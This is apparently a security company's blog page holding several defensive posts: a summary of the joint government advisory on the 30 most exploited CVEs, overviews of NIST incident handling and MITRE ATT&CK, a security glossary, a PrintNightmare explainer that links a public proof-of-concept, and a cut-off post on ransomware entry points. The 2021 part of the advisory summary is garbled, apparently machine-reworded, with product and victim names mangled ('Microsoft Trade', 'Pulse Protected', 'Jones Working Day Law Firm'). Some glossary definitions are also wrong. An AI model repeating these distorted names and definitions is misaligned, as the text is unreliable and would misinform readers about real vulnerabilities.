Author: Clear Infosec

  • CISA’s Top 30 Bugs from oldest to recent : Get patch immediately

    CISA’s Top 30 Bugs from oldest to recent : Get patch immediately

    Government agencies in the US, UK, and Australia are encouraging public and private-sector organizations to secure their networks by ensuring firewalls, VPNs, and other internally connected devices are patched against the most widespread cyber threats.

    Globally, cyber criminals continue to target a wide range of targets, including public and private sector organizations, by exploiting publicly known and often outdated software vulnerabilities. Companies can mitigate these vulnerabilities by applying patches and implementing a centralized patch management system to their systems worldwide.

    According to the US Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom’s National Cyber Security Centre (NCSC), and the US FBI, “ Almost all of the top vulnerabilities that were exploited last year have been revealed in the past two years., A 2017 vulnerability is among the top 30 most exploited vulnerabilities in 2021, almost seven months later.”

    Agencies says Cybercriminals will continue to exploit older known vulnerabilities, such as CVE-2017-11882, as long as they remain effective and unpatched systems are not patched. In addition to complicating attribution, the use of known vulnerabilities by potential actors reduces costs and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.”

    CVE-2017-11882 gets the highest attention due to the stack buffer overflow in equation editor of Microsoft Office which leads to remote code execution (RCE). Vendors have been warning about this exploit for years. The frequency is so high for an organization in 2020 using their devices and technology connected to networks without patching leads to the top four most exploited vulnerabilities which were discovered between 2018 to 2020.

     

    Top four Vulnerabilities:

    CVE-2019-19781: a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. According to a report published in December 2020, 17 percent of companies were unpatched. That is about one in five of the 80,000 companies.
    CVE 2019-11510: a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) advised users to change their passwords for Active Directory accounts, because the patches were released too late and bad actors were able to compromise those accounts.
    CVE 2018-13379: a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.
    CVE 2020-5902: a critical vulnerability in F5 Networks’ BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware, and more.

    2020 Top 13 Exploited Vulnerabilities:

    1. Citrix: CVE-2019-19781 : The Citrix NetScaler RCE, which debuted over Christmas in 2019, is at the top of the list because of gaining access to a Defense recruitment database that hit close to home for Aussies.

    2. Pulse: CVE-2019-11510 : Pulse Secure Connect where an attacker can run arbitrary scripts on any host that connects to the VPN once they have gained access to it. Anyone who connects to the VPN could be a potential target for a hacker.

    3. Fortinet: CVE-2018-13379 : Fortinet’s version of a directory traversal bug can lead to an attacker gaining usernames and passwords. “Multiple malware campaigns have taken advantage of this vulnerability. The most notable being Cringe ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo),” the agencies warned.

    4. F5- Big IP: CVE-2020-5902 : This CVE scored a perfect 10 when it was announced. Basically, it was a user interface for traffic management that allowed any old user to gain access to it.

    5. MobileIron: CVE-2020-15505 : Security agencies have warned that state-backed hackers and organized crime are exploiting a vulnerability in MobileIron mobile device management software.

    6. Microsoft Exchange: CVE-2020-0688 : This vulnerability happened when exchange servers failed to create a unique cryptographic key for the Exchange control panel at install time, which resulted in attackers being able to use malformed requests to run code under the SYSTEM context.

    7. Atlassian Confluence: CVE-2019-3396 : The NSA tried to warn people about these vulnerabilities last October. This old Atlassian Confluence vulnerability adds a touch of server-side template injection to the path traversal and remote code execution antics of other vendors.

    8. Atlassian Crowd: CVE-2019-11580 : Attackers can exploit this flaw to install arbitrary plugins, which can lead to remote code execution. This vulnerability was specifically mentioned by the agencies concerned.

    9. Drupal: CVE-2018-7600 : Drupal’s hook-crazed codebase lacks input sanitation, which can allow an unauthenticated attacker to gain remote code execution.

    10. Telerik: CVE-2019-18935 : The Telerik framework, which is used by ASP.NET apps, has a hole in refining the serialized input that can lead to RCE and crypto-jacking.

    11. Microsoft Sharepoint: CVE-2019-0604 SharePoint had a vulnerability when deserializing XML due to a lack of proper refinement, which could lead to remote code execution.

    12. Microsoft Windows Background Intelligent Transfer Service: CVE-2020-0787  : An attacker could exploit this vulnerability by mishandling symbolic links and executing arbitrary code with system-level privileges.

     13. Microsoft Netlogon: CVE-2020-1472 When it was first announced, it was commended as one of the worst bugs ever, and with a CVSS score of 10, it’s easy to see why

    Most Exploited Vulnerabilites in 2021 :

     From 115.8 million ransomware attacks in Q1 to 188.9 million attacks in Q2, ransomware attacks are on the rise. “This will be the worst year for ransomware” SonicWall has recorded, even if no ransomware attempts are detected in the second half of 2021

    This year’s flaws have also been actively exploited by CISA and other agencies:

    • Microsoft Trade: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: 4 flaws that can be chained collectively in the ProxyLogon group of security bugs that led to a patching frenzy. As of March, 92 p.c of the Trade Servers have been vulnerable to ProxyLogon, states Microsoft justifying the panic.
    • Pulse Protected: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was currently being applied by at least two state-of-the-art persistent threat actors (APTs), most likely joined to China, to attack U.S. protection targets, amid some others.
    • Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These types resulted in a slew of attacks, including one on Shell. Around 100 Accellion FTA customers, including the Jones Working Day Law Firm, Kroger, and Singtel, were hit by FIN11 and the Clop ransomware gang.
    • VMware: CVE-2021-21985: A critical bug in VMware’s virtualization management platform, vCenter Server, that makes it possible for a remote attacker to exploit the merchandise and consider management of a company’s impacted procedure.

    As a best practice, update systems with the latest software versions whenever they become available to minimize vulnerabilities. If the patch isn’t available, use the vendor’s temporary fixes to mitigate the risks. Prioritizing the fixation of critical vulnerabilities will aid in the prevention of potential cyber intrusions.

    There are a variety of ways that cybercrime can affect companies around the world. Don’t worry we got your back, just register now to speak with one of our experts and learn how to think like an attacker.

     

    Reference:

    Vaas, A. L., & Vaas, L. (n.d.). CISA’s top 30 Bugs: One’s old enough to buy beer. Threatpost English Global threatpostcom. https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/.

    Duckett, C. (2021, July 28). Get patching: US, UK, and Australia ISSUE joint advisory on top 30 exploited vulnerabilities. ZDNet. https://www.zdnet.com/article/get-patching-us-uk-and-australia-issue-joint-advisory-on-top-30-exploited-vulnerabilities/.

  • NIST Recommendations for Computer Security Incident Handling

    NIST Recommendations for Computer Security Incident Handling

    Computer security incident response is a very important component of information technology programs. Because performing incident response effectively is a complex and time-consuming task, establishing a successful incident response capability requires substantial planning and resources. The NIST Computer Security Incident Handling Guide provides in-depth guidelines on how to build an incident response capability within an organization.

    So, in this blog, we will talk about steps defined by NIST to approach Security Incidents Handling. The NIST incident response lifecycle breaks incident response down into four main steps: Preparation; Detection and Analysis; Containment, Eradication, and Recovery; and Post-Incident Activity

    Now, let’s take a look at each step individually.

     

    1.Preparation:

    NIST’s Incident response methodologies typically emphasize the preparation part by giving many guidelines for establishing an incident response capability so that the organization is ready to respond to incidents when needed. Along with that it also emphasizes preventing incidents by ensuring that systems, networks, and applications are sufficiently secure.

    The below image provides the starting point that is very useful during the preparation of incident handling.

    Keeping the number of incidents sensibly low is vital to secure and protect the business processes of the organization. Incident response teams are generally not responsible for securing resources, but they may be able to identify problems that the organization is not mindful of. This can be very significant for risk assessment as it helps to identify gaps.

    The National Software Reference Library (NSRL) Project maintains records of hashes of various files, including operating system, application, and graphic image files. The hashes can be downloaded from http://www.nsrl.nist.gov/. 

     

    2.Detection and Analysis:  

    The most challenging part of the incident response process is accurately detecting and assessing possible incidents. To make it more manageable we can look into signs of an incident.

    Once an incident is detected, every organization should have step-by-step instructions to be prepared to handle any incident. Incident can happen in countless ways, but some common attack vectors are covered here, which can be a starting point in the development of specific handling procedures.

    When an alert is suggesting that an incident has occurred, the team should rapidly perform an initial analysis to determine the incident’s scope. Performing the initial analysis and validation is very challenging, so we have covered some basic recommendations.

    Immediately after an incident is suspected, it should be documented properly.

    The most critical decision point in the incident handling process is to Prioritize how an incident handling will take place. According to NIST, Incidents should not be handled on a first-come, first-served basis, because it will result in resource limitations. Instead, it should be prioritized based on the relevant factors, such as the following:

    When an incident is analyzed and prioritized, the incident response team needs to notify the appropriate people so that all who need to be involved will play their roles. The exact reporting requirements can vary in every organization, but we have a list of people that are generally notified.

     

     3.Containment, Eradication, and Recovery: 

    Once an incident is detected, it can easily overwhelm resources and that may increase damage. That’s where containment comes, as it provides time for developing a step-by-step remediation strategy. An essential part of containment is decision-making (for example, which system to shut down, which system should be disconnected from a network, which functions should be disabled for how much time etc…).

    After an incident has been contained, Eradication and recovery should be done in a phase because at that time all the remediation steps need to be prioritized. For large-scale incidents, recovery may take several weeks to months. So, the early phases of recovery should only be focused on increasing the overall security with relatively quick (days to weeks) high-value changes to prevent future incidents.

     

     4.Post-Incident Activity : 

    The last part of the NIST incident response methodology is learning from previous incidents to improve the process. So after remediating an incident, the organization should take steps to identify and implement any lessons learned from that incident.

    Lessons learned activities should produce a set of objective and subjective data regarding each incident. Over time, the collected incident data can be useful in identifying security weaknesses and threats, as well as changes in incident trends. This data can also help develop the risk assessment process, which all can help in the determination and execution of extra controls.

     

    Incident Handling Checklist:

    The checklist provided the following covers the major steps to be performed in the handling of an incident. Actual steps performed may vary based on the type of incident and the nature of individual incidents, but this can be taken as a guideline provided by NIST.

     

    Recommendations:

    The key recommendations presented in the NIST document for handling incidents are summarized below.

  • Cybersecurity terms that everyone should know

    Cybersecurity terms that everyone should know

    Cybersecurity, being very important from the invention of computers and networks, is gaining more attention as even the most advanced organizations have fallen victim to cyber-attacks in just the past decade. But it stayed a responsibility of the IT team of an organization for a long period. The pandemic of 2020 had established that cybersecurity is not just an IT team’s responsibility but of the entire employees’.  

    Regardless of your role in your organization, this article will cover a lot of cybersecurity terminologies that will keep everyone, from security professionals to general end-user, informed. Take your time to grasp and upon interest, you can expand your knowledge about one or many, which you may find interesting and want to excel.

     

    A

    Access control: It ensures the resources are granted to the right users with the right permissions

    Advanced Persistent Threat (APT): It is a security event in which the bad actor gains access to a system or network without being detected

    Adware: Refers to any piece of software or application that display advertisements on the user’s computer

    Algorithm: A set of step-by-step instructions for solving a problem, especially one that can be implemented by a computer.

    Asset: An asset can be any material that is used to complete a task.

    Authentication: It is the process of verifying that a person is who he claims to be.

    Authorization: Process of giving the right permissions to the authenticated users.

    Availability: The surety that a system can meet its purpose and is accessible to all the users using it.

     

    B

    Backdoor: A hidden method/tool used by the attacker on the compromised system to bypass security and gain unauthorized access to the restricted parts of a system

    Baiting: The process of luring users into a trap that steals their personal information or inflicts their systems with malware

    Blackhat: A Blackhat hacker is an attacker who violates a computer or network for personal gain.

    Blacklist: List of a specific set of files that are known to be malicious or otherwise unwanted.

    Botnet: A collection of computers that are compromised and used to create and send spam or virus to flood with messages causing a Denial-of-Service attack

    Bring Your Own Device (BYOD): Refers to whether the employees can bring their own devices to work and access resources through them.

    Brute force attack: Activity that involves repetitive successful attempts of trying various password combinations to break into any web application.

    Bug: It refers to an error, fault, or flaw in a computer program that may cause it to behave abnormally.

     

    C

    Cache: Pronounced as CASH. It is a high-speed storage mechanism.

    Chain of Custody: It is important to the Federal rules of evidence and its handling.

    Ciphertext: Encrypted form of a message being sent

    Clickjacking: Also known as UI Redress attack. A common hacking method is where an attacker may use an invisible page or HTML to overlay the legitimate page.

    Common Vulnerabilities and Exposures (CVE): It is an online database operated by the MITRE organization which has the details of all attacks, exploits, and compromises for the public’s benefit.

    Confidentiality: The need to ensure that the information is disclosed to only the authorized users.

    Cracker: It is the proper term to refer to an unauthorized person or an attacker, instead of the term hacker.

    Cryptography: The application of mathematical processes on data at rest and data in transit to ensure its safety.

    Cyber Ecosystem: The collection of computers, networks, communication paths, applications, users, and data.

    Cyberespionage: The unethical act of leaking data while violating an organization’s privacy and security.

     

    D

    Daemon: A program that is often started at the time of booting runs continuously without interventions.

    Data integrity: Term ensuring the data is unmodified and therefore original, complete, and intact.

    Data mining: Process of analyzing data in order to find the relevant and significant items

    Data theft: Act of stealing data intentionally

    Distributed Denial of Service (DDOS) Attack: An attack method that blocks the users to access the resource

    Decrypt: The act of transforming a cyphertext back to its original form.

    Demilitarized Zone (DMZ): A segment or subnet of a private network where the resources are hosted in a publically accessible manner. That is, to the public through the internet.

    Digital forensics: Process of gathering digital information to be used as a piece of evidence in a legal procedure.

     

    E

    Eavesdropping: The act of listening to a network while a transaction or communication is made.

    Encode (Encrypt): The act of converting a message into a coded format, named ciphertext.

    Exploit: A malicious application that can take advantage of a computer’s vulnerability.

     

    F

    Firewall: A software or hardware that screens out viruses, attackers, and worms that are trying to enter one’s system.

     

    G

    Gap analysis: The comparison of actual performance against the anticipated or required one.

     

    H

    Hacktivism: Attacking a system or a network with a motivation driven by a cause or a belief rather than personal gain.

    Honeypot: A trap or decoy for attackers

     

    I

    Identity cloning: A type of identity theft in which the attacker holds the identity of the victim and live in the network with that stolen identity

    Incident: An adverse event in an information system or network

    Incident response plan: A plan to execute or the way to respond if a security event has occurred

    Insider threat: The likelihood that internal personnel may pose a risk to the security of an organization

    Intrusion Detection System (IDS): A tool that detects the presence of intruders or the occurrence of a security violation and notifies the admins.

     

    J

    JavaScript-Binding-Over-HTTP (JBOH): An Android-specific mobile device attack that allows an attacker to start the execution of arbitrary code on a compromised device.

     

    K

    Keylogger: Any method of recording a victim’s keystrokes as they are typed into a physical keyboard.

    Kernel: The central component of a computer operating system, the core, which provides basic services to all other components.

     

    L

    Least Privilege: The principle of granting users or applications only the least amount of permissions they require to carry out their intended function.

    Loopback Address: a pseudo-IP address (127.0.0.1) that always refers back to the localhost and is never broadcast over the internet.

     

    M

    MAC Address: It is a physical address on a network device which is a numeric value that distinguishes it from every other device on the planet.

    Malicious Code: Software that appears to perform a useful or desirable function while gaining unauthorized access to system resources or tricking a user into performing malicious logic.

    Malware: Any code written with the intent of causing harm, disclosing information, or otherwise jeopardizing a system’s security or stability.

    Morris Worm: A worm program that flooded the ARPANET in November 1988, causing problems for many of the hosts. It was written by Robert T. Morris, Jr.

    Multi-Factor Authentication (MFA): a method of confirming a user’s identity by requiring them to provide multiple pieces of identifying information.

     

    N

    National Institute of Standards and Technology (NIST): A physical sciences lab and a non-regulatory agency of the United States Department of commerce. They promote and maintain measurement standards.

    Network Address Translation (NAT): used to distribute one or a few publicly routable IP addresses to many hosts

    Network Mapper (Nmap): A utility used for network discovery and security auditing. It is open-source and free.

    Non-Repudiation: The ability for a system to prove that a message was sent by a specific user and only that user and that it has not been altered.

    Null Session (Anonymous Logon): A method of allowing an anonymous user to connect to a network and retrieve information such as usernames and shares without requiring authentication.

     

    O

    Outsider threat: The possibility that an external entity, such as an ex-employee, competitor, or even an unhappy customer, could jeopardize an organization’s stability or security.

     

    P

    Packet: A message fragment sent over a packet-switching network.

    Password Authentication Protocol (PAP): A simple, weak authentication mechanism in which a user enters a password, which is then sent across the network in cleartext.

    Password Cracking: The process of trying to guess passwords, given the password file information

    Password Sniffing: Also known as Passive wiretapping, is a method of obtaining password information by listening in on a local area network.

    Patch: A small update released by a software company to fix bugs in previously installed software.

    Penetration: Bypassing a system’s protections and gaining unauthorized logical access to sensitive data.

    Personal firewall: Firewalls that are installed and run-on personal computers

    Pharming: A more advanced version of a MITM attack where a user’s session is hijacked and redirected to a spoof website.

    Phishing: Act of tricking a user into entering valid credentials at a fake website by sending them e-mails that appear to come from a trusted source.

     

    R

    Ransomware:  A type of malware that is a form of extortion and it works by encrypting a victim’s hard drive and preventing them from accessing critical files.

    Risk: The product of the threat level and the level of vulnerability

    Risk assessment: The process of determining an organization’s risk level.

    Root: The name of the administrator account in Unix systems.

    Rootkit: A collection of tools used by hackers for masking intrusion and gaining administrator-level access.

     

    S

    Sandboxing: A method of testing or evaluating applications, code, or entire operating systems by isolating them.

    Secure Shell (SSH): A program that allows you to log into another computer over the internet, run commands on that machine, and transfer files from one machine to another.

    Secure Sockets Layer (SSL): Protocol developed by Netscape for sending confidential documents over the Internet.

    security perimeter: A network’s or a private environment’s perimeter where specific security policies and rules are enforced

    Session: A virtual connection between 2 hosts.

    Session Hijacking: The act of taking over some else’s session.

    Social Engineering: Art of manipulating people into doing something or disclosing some sensitive information.

    Spear phishing: the misleading practice of sending emails pretending to come from a known or trusted sender in order to persuade recipients to reveal confidential information.

    Spoof (spoofing): An unauthorized entity attempting to gain access to a system by impersonating an authorized user.

    Spyware: Type of software that gets installed itself on a device and monitors it secretly.

     

    T

    Tailgating: Act of someone without authentication entering a restricted area following an authorized person.

    Threat: When a circumstance, capability, action, or event exists that has the potential to breach security and cause harm, there is a potential for security violation.

    Threat assessment: It is the process involved in finding out the types of threats that an organization might be exposed to.

    Threat Model: A model which describes the given threat and the impact on it

    Threat Vector: The method by which a threat approaches the target.

    Time to Live: A mechanism for limiting the amount of time data can be stored in a computer or network.

    Traffic: Amount of data sent and received by visitors at a given time

    Trojan: Malicious software that is created by hackers disguised as legitimate software to gain access to target users’ computers. Also known as Trojan Horse.

    Tunnel: a protocol for transferring data from one network to another in a secure manner.

     

    U

    Unauthorized access: Unauthorized Access occurs when someone who does not have permission to connect to or use a system gains access in a way that the system owner did not intend.

     

    V

    Virtual Private Network (VPN): It defines the opportunity to establish a secure network connection when using public networks.

    Virus: a malicious software program that is installed on a user’s computer without their permission and performs malicious actions.

    Vishing: A type of phishing that is carried out over a call

    Vulnerability: A security flaw in a system that an attacker can exploit to gain unauthorized access

     

    W

    Whaling: A form of phishing targeting high-profile businesspersons and managers.

    Whitehat: Legal hackers who work for organizations to test their systems by attacking them.

    Whitelist: A list of trusted apps that can be executed in a restricted system

    Worm: A type of malware that is primarily concerned with replication and distribution.

     

    X

    X-509 certificate: Used in SSL/TLS connections to ensure that the client (Web browser) is not tricked by a malicious impersonator posing as a well-known, reliable website.

    X-mas Scan: This scan sets the ACK, SYN, URG, RST, and FIN flags all at once and got this name as it lights the packet like a Christmas tree

    XML injection: A type of attack that manipulates or compromises the logic of an XML application.

    XSS (Cross-Site Scripting): A type of attack aiming at the vulnerabilities found in browsers enabling the attacker to inject scripts into web pages.

     

    Y

    Y2K Bug (Year 2000 bug or Millennium bug): It refers to a widely used computer programming shortcut that was predicted to cause massive havoc as the year 2000 was approaching.

    Yara Rules: It is a way of finding malware by creating malware family descriptions based on textual or binary patterns

    Yaska: An open-source program that scans source codes for security vulnerabilities, code quality, performance, and compliance with best practices.

    Yersinia: A valuable and widely used tool for Unix-like operating systems that aims to exploit flaws in various network protocols.

     

    Z

    Zero Day: A recently discovered vulnerability that needs to be fixed as soon as possible because if found by a bad actor can be used to gain unauthorized access.

    Zombies: A zombie computer is an Internet-connected computer that has been compromised, infected with a computer virus, or infected with a trojan horse.

    As long as computers exist, we humans have to take cybersecurity seriously and what we have covered in this article are “just some” of the terms in cybersecurity. Yes. This is just the tip of the iceberg in terms of the entire terminologies that exist.

    But there is nothing much to worry about if you know what you are doing…!

  • PRIMER ON MITRE ATT&CK 101

    PRIMER ON MITRE ATT&CK 101

    I am here with a blog on the MITRE ATT&CK because it has gained a lot of attention and popularity in recent years.

    ATT&CK is a framework developed by MITRE. It is globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

    ATT&CK stands for Adversarial Tactics, Techniques, and Common Knowledge.

    It is a way of telling a story, a story about how an attacker is going to progress through their mission, what steps they are going to take or what steps are possible for them to take in order to execute a successful attack.

    It does 2 things:

    1. It narrow downs your search by giving you all the possibilities of different techniques.
    2. They have been collecting the data on well-known attackers and mapping that to their framework constantly, which makes them unique.

    Because, it is based on real-world observations of past attacks, it gives us detailed insights on what adversaries have done in past to conduct attack, and on what adversaries are likely doing pre and post attack.

     

    Why ATT&CK was created:

    It is like an encyclopedia which has all the information’s about different activities of attackers.

    ATT&CK is open and available to any person or organization for use at no charge.

    The main reason why ATT&CK was created and it became so popular in short time in the industry is that it provides same language for all the teams of an organization. It’s also a great starting point to get multiple people and teams on the same page, using the same terminology for security testing and mitigation as it provides specific name and numbers for different attack techniques.

     

    MITRE ATT&CK can help us achieve Difficult task of detecting TTPs:

    ATT&CK focuses on TTPs: Tactics, Techniques, and procedures

    Let’s understand why it focuses on TTPs using pyramid of pain shown below:

    The point of detecting this indicator is to respond to them by analyzing it and stopping adversaries at that level. It depends on how quickly we can deny adversaries using one of those indicators when they are trying to attack us.

    It shows 6 different indicators. The point of detecting this indicator is to respond to them by analyzing it and stopping adversaries at that level. It depends on how quickly we can deny adversaries using one of those indicators when they are trying to attack us.

    This pyramid shows what is easy for adversaries to do and what is most difficult for adversaries to do. So here at the apex we can see

    TTPs : Tactics, Techniques and procedures

     When we detect and respond at this level, we are operating directly on adversary behaviors. It is the most difficult thing for an adversary to change in their behaviors and pattern of carrying an attack. So instead of figuring out which tool they are using, first if we can get to know their TTPs, we can secure our systems far better and if we are already under attack, we can detect it in early stage and mitigate those.

    MITRE ATT&CK Framework can help us figure out those TTPs very quickly and with that,

    If we can respond to adversary TTPs quickly enough, we force them to do the most difficult and time-consuming thing to do which is learning new behaviors.

     

    MITRE ATT&CK Matrices:

    It is Free, Open, globally accessed tool. You can access it on: https://attack.mitre.org/

    It contains 3 Matrix:

    1. Enterprise
    2. Mobile
    3. ICS (Industrial Control Systems)

    Enterprise it the most popular one. The Matrix contains information for the following platforms: Windows, macOS, Linux, PRE, Azure AD, Office 365, Google Workspace, SaaS, IaaS, Network, Containers.

    They are displayed in matrices that are arranged by attack stages, from Reconnaissance and initial system access to Privilege escalation, Command and Control to the Impact of the attack.

    It is constantly being updated but at the time of writing this blog it has:

    Enterprise Tactics: 14

    Enterprise Techniques: 185

    Enterprise Sub-techniques: 367

    Tactics and techniques is a way of analyzing real-world cyberattacks.

    Top Row is Tactics                           : Adversaries Technical goals
    Under each of those Techniques : How the adversary achieve their goal

    Here the techniques are most important because it is a specific single step taken by attacker to exploit any system. And if we can detect it early enough, we can prevent future attacks or stop the one which is currently happening. For that ATT&CK provides many details about each technique including a description, examples, references, and suggestions for mitigation and detection.

     

    MITRE ATT&CK VS Lockheed Martin’s Cyber Kill Chain:

    After looking at the Matrix, some of us might remember Lockheed Martin’s Cyber Kill Chain. They both resemble each other because they define the steps an attacker uses to achieve their goal. So let’s compare them:

    As we can see, both follow the same pattern, but ATT&CK provides us with more detailed techniques and sub-techniques.

    We can say that they are complementary. ATT&CK sits at a lower level of definition to describe adversary behavior than the Cyber Kill Chain. ATT&CK Tactics may not be followed by adversary in the same order, because the goal of an adversary changes throughout an operation and also based on type of attack, whereas the Cyber Kill Chain have all the phases are in ordered manner to describe high-level adversary objectives.

    But the Cyber Kill Chain does not go deep into what to do after an attacker has broken into your network successfully, and all those different techniques which ATT&CK Matrix has.

    So, we can say that Cyber kill chain has several security gaps because it has not been modified since its created, but MITRE ATT&CK Framework has filled in all of those gapes and the main advantage is, it’s constantly being updated and expanded by the community.

     

    Different Enterprise ATT&CK Tactics:

    1. Reconnaissance: Techniques an adversary uses to do active or passive information gathering. Which can be used to plan out the roadmap of an attack. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle.
    2. Recourse development: Techniques an adversary uses when he is trying to establish resources which they can use to later to support different stages of their operations. These resources can be leveraged by the adversary to use in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.
    3. Initial access: Techniques an adversary uses when he is trying to get into your network to establish that initial foothold within the network. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords. It can be gained by Exploiting public facing application, Phishing/Spear phishing etc.
    4. Execution: Techniques where an adversary is trying to run an adversary-controlled malicious code on a local or remote system. An adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery, or it can abuse windows command shell, python scripts or java scripts.
    5. Persistence: Techniques used by an adversary to maintain persistent access of a compromised system. They make sure that restarts, changed credentials, and other interruptions that could cut off their access. It can be achieved by Adding Office 365 Global Administrator Role, Boot or Logon AutoStart Execution
    6. Privilege escalation: Techniques used by an adversary to gain higher-level privileges on a system or network. Adversaries start with entering and exploring a network with unprivileged access, but it requires elevated permissions to gain sensitive information and complete the attack. It is achieved by taking an advantage of system weaknesses, misconfigurations, and vulnerabilities.
    7. Defense evasion: Techniques where the adversary is trying to avoid being detected through the whole attack. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. He may Bypass User Account Control (UAC) mechanisms to elevate process privileges on system.
    8. Credential access: Techniques for stealing credentials such as account names and passwords. He can use Techniques like keylogging or credential dumping, brute force attack, Forced Authentication, etc.
    9. Discovery: Techniques where the adversary is trying to figure out your environment and gain knowledge about the system and internal network. So, he can observe the environment and prepare himself before deciding how to act.
    10. Lateral movement: Techniques used by adversary when he is trying to move through our environment after compromising it. Adversary typically have to pivot through multiple systems and accounts to find the weakest link in the chain of machines, to ultimately reach their end objective. They might install their own remote access tools to do this. He can also use techniques like Remote service session hijacking, pass the hash etc.
    11. Collection: Techniques used by adversary when he is trying to gather relevant data which will help them with their end goal. They can use Input capture, Audio capture, Man-in-the-Middle etc.
    12. Command & Control:Techniques used by adversary to communicate with compromised systems to control them. This type of the channel provides attackers with direct remote access to the compromised system in the target environment. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.
    13. Exfiltration: Techniques used by adversary to steal data from our network. Most of the times adversaries package collected data to avoid detection while removing it. Compression and encryption can be used for that. For getting data out of a victim’s network, adversary typically transfers it over their command-and-control channel or an alternate channel. It can be also done over physical medium or through web services.
    14. Impact: Techniques used by adversary to disrupt availability or compromise integrity by manipulating, interrupting, or destroying victim’s system and data or using Denial of Service. Techniques used for impact can include Account access removal, destroying or tampering with data or Endpoint Denial of Service. In some cases, business processes can look fine, but it may have been altered by adversaries to achieve their goals.

    Now that we’ve covered the basics of ATT&CK framework you can look forward to future blog post where I will write about how you can start using ATT&CK for Cyber Threat Intelligence (CTI).

    Thanks for reading.

  • The PrintNightmare

    The PrintNightmare

    As a security researcher, I used to search for new exploits and vulnerabilities daily or more often.

    In the past few days, I have been sighting “ PrintNightmare” more often on Twitter and Reddit. That made me curious, and I was digging up more onto it. After some research, I came to know that it is a 0-day bug that was misunderstood to be fully patched but not.

    PrintNightmare was initially described as CVE-2021-1675 as low elevation of local privilege escalation (LPE) vulnerability by Microsoft during the June 8th patch update. But things changed on June 21, when Microsoft changed the CVE-2021-1675 to ”Critical” as this leads to Remote Code Execution (RCE) attacks.

    An RCE attack happens when an attacker accesses and manipulates a system/server without authentication from its owner.

    The printer Spooler bug has a history as it was used in “Stuxnet” an ICS malware found in 2010, a dangerous worm that created vast damage to the nuclear plants of Iran by affecting more than 45000 networks.

    A proof-of-concept (POC) for a critical windows security vulnerability that allows RCE and LPE attack was released on Twitter by a Chinese security researcher Zhiniang Peng but was taken down later. But soon the PoC was forked in Github and started spreading widely with an updated version of the original POC. You can find the copy of the original PoC here – https://github.com/afwu/PrintNightmare/

    If remote adversaries can bypass the authentication of RpcAddPrinterDriver, this could lead to the installation of a malicious driver in the print server. The flaw is in RpcAddPrinterDriver, a service that allows remote printing and installs drivers. Print Divers can create a big mess as they have full code execution as SYSTEM. The function will allow users with “SeLoadDriverPrivilege” by default administrators and Print Operators can add drivers to a remote Print Spooler.

    PrintNightmare has affected Windows 7 to Windows 10 and from Server 2008 to Server 2019. The most dangerous is that it can affect Active Directory domain controllers because PrintSpooler is enabled by default. Domain control takeovers are a real nightmare for organizations as this will widely affect the business-critical data and also financially.

    Hacker Fantastic posted a tweet where he shows a fully patched Windows 2019 Domain Controller was exploited easily by CVE-2021-1675 by a regular domain user account which is scary. This could also lead to Ransom attacks which are widely happening in recent times. At first, PrintNighmare was addressed as CVE-2021-1675 but after the severity, it was updated to CVE-2021-34527

    PrintNightmare has been added to WinPwn and Automation for internal Windows Penetration testing.

    Temporary mitigation for PrintNightmare – (CVE- 2021-1675) :

    • Update/patch your systems to the most recent version right away.
    • Disable print spooler service on unnecessary systems and servers
    • Create a Deny rule for the driver’s directory and all subdirectories, which will prevent the SYSTEM account to modify its contents

  • How Ransomware Targets Your Organization in 2021

    Ransomware is a malware that in the last two years has become an important threat to US companies and people. Any business, government, organization, or person can be a target for ransomware who is willing to pay a ransom to regain access to their information. The most common variants are crypto-ransomware and locker ransomware.

    Crypto ransomware – Crypto ransomware looks for flaws and weaknesses in computers and devices – seeking out data that has not been backed up. This data can be anything of importance including financial data, large work projects, phone numbers, photos, tax, and videos.

    Locker ransomware – Locker ransomware locks and shuts down the entire computer or mobile device and victims are asked to pay a ransom to release the computer or mobile device.

    How Ransomware Targets:

    Remote Desktop:

    As employees moved workstations from their offices to their homes in a short period, there wasn’t much time for the organizations to reconfigure home networks and endpoints to establish multi-level security that’s inherent in enterprise networks. The year 2020 saw the biggest increase in RDP attacks after then, targeting U.S. companies.

    Many ransomware attacks take their place in a target organization by means of weakness or the deployment of RDP software. As reported by ZScaler reports, Brute-forcing RDP is the most frequently used method for Windows system access and malware execution. Here are the recent RDS/RDP vulnerabilities :

    CVE-2019-0787:

    This vulnerability can be a problem for users who connects to a server that’s compromised.

    CVE-2019-1181 / CVE-2020-0609 / CVE-2019-1182:

    Attackers use these vulnerabilities to override remote code on a server running RDS.

    SaaS Apps:

    As software-as-a-service (SaaS) apps becoming the default system of record for organizations, attackers are now targeting SaaS to break into organizations from server operating systems to flaws in applications and Web also application frameworks.

    The SaaS category had the most CVEs seen trending with active exploits among ransomware families. Attackers are looking for more severe vulnerabilities to reach targets that are capable of remote code execution (RCE) or privilege escalation (PE) when exploited. If your organization is deploying more SaaS applications, be prepared with primary security risks to understand where proper SaaS security should be applied.

    Aged vulnerabilities:

